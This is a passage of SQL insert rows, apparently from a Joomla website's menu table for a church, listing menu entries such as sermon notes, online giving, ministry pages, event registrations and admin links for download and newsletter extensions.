(1000, 'mainmenu', 'Video on Demand', 'vod', '', 'resources/vod', 'https://www.youtube.com/user/lifeoasischurch/videos', 'url', 1, 102, 2, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 58, 59, 0, '*', 0),
(1001, 'mainmenu', 'Spirit Meat Devotional', 'spirit-meat', '', 'resources/spirit-meat', 'http://www.spiritmeat.net/', 'url', 1, 102, 2, 2, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 60, 61, 0, '*', 0),
(1058, 'mainmenu', 'Live Blog', 'live-blog', '', 'resources/live-blog', '#', 'url', -2, 102, 2, 10475, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 66, 67, 0, '*', 0),
(1059, 'main', 'COM_PHOCADOWNLOAD', 'com-phocadownload', '', 'com-phocadownload', 'index.php?option=com_phocadownload', 'component', 1, 1, 1, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu.png', 0, '{}', 369, 396, 0, '', 1),
(1060, 'main', 'COM_PHOCADOWNLOAD_CONTROLPANEL', 'com-phocadownload-controlpanel', '', 'com-phocadownload/com-phocadownload-controlpanel', 'index.php?option=com_phocadownload', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-control-panel.png', 0, '{}', 370, 371, 0, '', 1),
(1061, 'main', 'COM_PHOCADOWNLOAD_FILES', 'com-phocadownload-files', '', 'com-phocadownload/com-phocadownload-files', 'index.php?option=com_phocadownload&view=phocadownloadfiles', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-files.png', 0, '{}', 372, 373, 0, '', 1),
(1062, 'main', 'COM_PHOCADOWNLOAD_CATEGORIES', 'com-phocadownload-categories', '', 'com-phocadownload/com-phocadownload-categories', 'index.php?option=com_phocadownload&view=phocadownloadcats', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-category.png', 0, '{}', 374, 375, 0, '', 1),
(1063, 'main', 'COM_PHOCADOWNLOAD_LICENSES', 'com-phocadownload-licenses', '', 'com-phocadownload/com-phocadownload-licenses', 'index.php?option=com_phocadownload&view=phocadownloadlics', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-lic.png', 0, '{}', 376, 377, 0, '', 1),
(1064, 'main', 'COM_PHOCADOWNLOAD_STATISTICS', 'com-phocadownload-statistics', '', 'com-phocadownload/com-phocadownload-statistics', 'index.php?option=com_phocadownload&view=phocadownloadstat', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-stat.png', 0, '{}', 378, 379, 0, '', 1),
(1065, 'main', 'COM_PHOCADOWNLOAD_DOWNLOADS', 'com-phocadownload-downloads', '', 'com-phocadownload/com-phocadownload-downloads', 'index.php?option=com_phocadownload&view=phocadownloaddownloads', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-downloads.png', 0, '{}', 380, 381, 0, '', 1),
(1066, 'main', 'COM_PHOCADOWNLOAD_UPLOADS', 'com-phocadownload-uploads', '', 'com-phocadownload/com-phocadownload-uploads', 'index.php?option=com_phocadownload&view=phocadownloaduploads', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-uploads.png', 0, '{}', 382, 383, 0, '', 1),
(1067, 'main', 'COM_PHOCADOWNLOAD_FILE_RATING', 'com-phocadownload-file-rating', '', 'com-phocadownload/com-phocadownload-file-rating', 'index.php?option=com_phocadownload&view=phocadownloadrafile', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-vote-file.png', 0, '{}', 384, 385, 0, '', 1),
(1068, 'main', 'COM_PHOCADOWNLOAD_TAGS', 'com-phocadownload-tags', '', 'com-phocadownload/com-phocadownload-tags', 'index.php?option=com_phocadownload&view=phocadownloadtags', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-tags.png', 0, '{}', 386, 387, 0, '', 1),
(1069, 'main', 'COM_PHOCADOWNLOAD_LAYOUT', 'com-phocadownload-layout', '', 'com-phocadownload/com-phocadownload-layout', 'index.php?option=com_phocadownload&view=phocadownloadlayouts', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-layout.png', 0, '{}', 388, 389, 0, '', 1),
(1070, 'main', 'COM_PHOCADOWNLOAD_STYLES', 'com-phocadownload-styles', '', 'com-phocadownload/com-phocadownload-styles', 'index.php?option=com_phocadownload&view=phocadownloadstyles', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-style.png', 0, '{}', 390, 391, 0, '', 1),
(1071, 'main', 'COM_PHOCADOWNLOAD_LOGGING', 'com-phocadownload-logging', '', 'com-phocadownload/com-phocadownload-logging', 'index.php?option=com_phocadownload&view=phocadownloadlogs', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-logs.png', 0, '{}', 392, 393, 0, '', 1),
(1072, 'main', 'COM_PHOCADOWNLOAD_INFO', 'com-phocadownload-info', '', 'com-phocadownload/com-phocadownload-info', 'index.php?option=com_phocadownload&view=phocadownloadinfo', 'component', 1, 1059, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_phocadownload/images/administrator/icon-16-pdl-menu-info.png', 0, '{}', 394, 395, 0, '', 1),
(1073, 'mainmenu', 'Publication and Magazine', 'downloads', '', 'resources/downloads', 'index.php?option=com_phocadownload&view=category&id=1', 'component', 1, 102, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_pagination\":\"1\",\"show_pagination_limit\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 62, 63, 0, '*', 0),
(1074, 'mainmenu', 'Happily Married Women', 'hpw', '', 'ministries/hpw', 'index.php?option=com_content&view=article&id=119', 'component', 0, 253, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 120, 121, 0, '*', 0),
(1075, 'mainmenu', 'Young Achievers', 'young-achievers', '', 'ministries/young-achievers', 'index.php?option=com_content&view=article&id=117', 'component', 0, 253, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 122, 123, 0, '*', 0),
(1076, 'mainmenu', 'Daughters of Destiny', 'dod', '', 'ministries/dod', 'http://www.anointeddaughtersofdestiny.org', 'url', 0, 253, 2, 22, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 124, 125, 0, '*', 0),
(1077, 'mainmenu', 'WOW 2019 Online Registration', 'gobc-2019-online-registration', '', 'gobc-2019-online-registration', 'https://solaareogunministries.org/wow2019/', 'url', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 133, 134, 0, '*', 0),
(1078, 'mainmenu', 'Shop', 'shop', '', 'shop', 'http://www.abundantlifehouse.org', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 135, 136, 0, '*', 0),
(1079, 'mainmenu', 'Online Giving', 'online-giving', '', 'online-giving', '#', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 137, 146, 0, '*', 0),
(1080, 'mainmenu', 'Online Giving (2)', 'online-giving-2', '', 'online-giving-2', 'http://payment.lifeoasisinternationalchurch.org/', 'url', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 157, 158, 0, '*', 0),
(1081, 'mainmenu', 'Sola Areogun Ministries', 'soar', '', 'soar', 'https://www.solaareogunministries.org', 'url', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 155, 156, 0, '*', 0),
(1082, 'mainmenu', 'Branches', 'branches', '', 'branches', 'index.php?option=com_content&view=article&id=121', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 401, 402, 0, '*', 0),
(1083, 'mainmenu', 'Partnership', 'partnership', '', 'partnership', '#', 'url', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 147, 154, 0, '*', 0),
(1084, 'quickmenu', 'Online Giving', 'giving', '', 'giving', 'http://payment.lifeoasisinternationalchurch.org/', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 291, 292, 0, '*', 0),
(1085, 'quickmenu', 'Abundant Life House Store', 'alh', '', 'alh', 'http://www.abundantlifehouse.org', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 287, 288, 0, '*', 0),
(1086, 'quickmenu', 'Internet Radio', 'iradio', '', 'iradio', 'http://dciradio.org', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 289, 290, 0, '*', 0),
(1087, 'quickmenu', 'Throne Room Music', 'music', '', 'music', 'https://abundantlifehouse.org/index.php?route=product/category&path=79', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 403, 404, 0, '*', 0),
(1088, 'main', 'JM_NEWSLETTER', 'jm-newsletter', '', 'jm-newsletter', 'index.php?option=com_joomailermailchimpintegration', 'component', 1, 1, 1, 10484, 0, '0000-00-00 00:00:00', 0, 1, '../media/com_joomailermailchimpintegration/backend/images/mail_16.png', 0, '{}', 405, 412, 0, '', 1),
(1089, 'main', 'JM_LISTS', 'jm-lists', '', 'jm-newsletter/jm-lists', 'index.php?option=com_joomailermailchimpintegration&view=lists', 'component', 1, 1088, 2, 10484, 0, '0000-00-00 00:00:00', 0, 1, '../media/com_joomailermailchimpintegration/backend/images/lists_16.png', 0, '{}', 406, 407, 0, '', 1),
(1090, 'main', 'JM_CAMPAIGNS', 'jm-campaigns', '', 'jm-newsletter/jm-campaigns', 'index.php?option=com_joomailermailchimpintegration&view=campaignlist', 'component', 1, 1088, 2, 10484, 0, '0000-00-00 00:00:00', 0, 1, '../media/com_joomailermailchimpintegration/backend/images/template_16.png', 0, '{}', 408, 409, 0, '', 1),
(1091, 'main', 'JM_REPORTS', 'jm-reports', '', 'jm-newsletter/jm-reports', 'index.php?option=com_joomailermailchimpintegration&view=campaigns', 'component', 1, 1088, 2, 10484, 0, '0000-00-00 00:00:00', 0, 1, '../media/com_joomailermailchimpintegration/backend/images/recent_campaigns_16.png', 0, '{}', 410, 411, 0, '', 1),
(1095, 'streaming', 'streaming', 'streaming', '', 'streaming', 'index.php?option=com_content&view=article&id=108', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 413, 414, 0, '*', 0),
(1096, 'mainmenu', 'Tithe and Offering', 'tithe-and-offering', '', 'online-giving/tithe-and-offering', 'https://lifeoasisinternationalchurch.org/offering-tithe/', 'url', 1, 1079, 2, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 138, 139, 0, '*', 0),
(1097, 'mainmenu', 'GTCollections PayNOW', 'gtpay', '', 'online-giving/gtpay', 'https://ibank.gtbank.com/GTPay/GTCollections.aspx?custformid=4881', 'url', 0, 1079, 2, 2, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 142, 143, 0, '*', 0),
(1098, 'mainmenu', 'ANWC 2019 Online Registration', 'anwc-2019-online-registration', '', 'anwc-2019-online-registration', 'https://solaareogunministries.org/anwc2019', 'url', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 431, 432, 0, '*', 0),
(1099, 'mainmenu', 'Monthly Bible Reading', 'bible-reading', '', 'resources/bible-reading', 'index.php?option=com_content&view=article&id=123', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 110, 111, 0, '*', 0),
(1100, 'main', 'COM_JLEXBLOCK', 'com-jlexblock', '', 'com-jlexblock', 'index.php?option=com_jlexblock', 'component', 1, 1, 1, 10504, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 415, 416, 0, '', 1),
(1101, 'mainmenu', 'Sermon Notes', 'sermon-notes', '', 'resources/sermon-notes', 'index.php?option=com_phocadownload&view=category&id=2', 'component', 0, 102, 2, 10483, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_pagination\":\"1\",\"show_pagination_limit\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 64, 65, 0, '*', 0),
(1102, 'mainmenu', 'Partnership Level', 'level', '', 'partnership/level', 'index.php?option=com_content&view=article&id=122', 'component', 1, 1083, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 148, 149, 0, '*', 0),
(1103, 'mainmenu', 'Partnership Form', 'partnership-form', '', 'partnership/partnership-form', 'index.php?option=com_content&view=article&id=124', 'component', -2, 1083, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 150, 151, 0, '*', 0),
(1104, 'mainmenu', 'Partnership Form', 'form', '', 'partnership/form', 'index.php?option=com_content&view=article&id=124', 'component', 0, 1083, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 152, 153, 0, '*', 0),
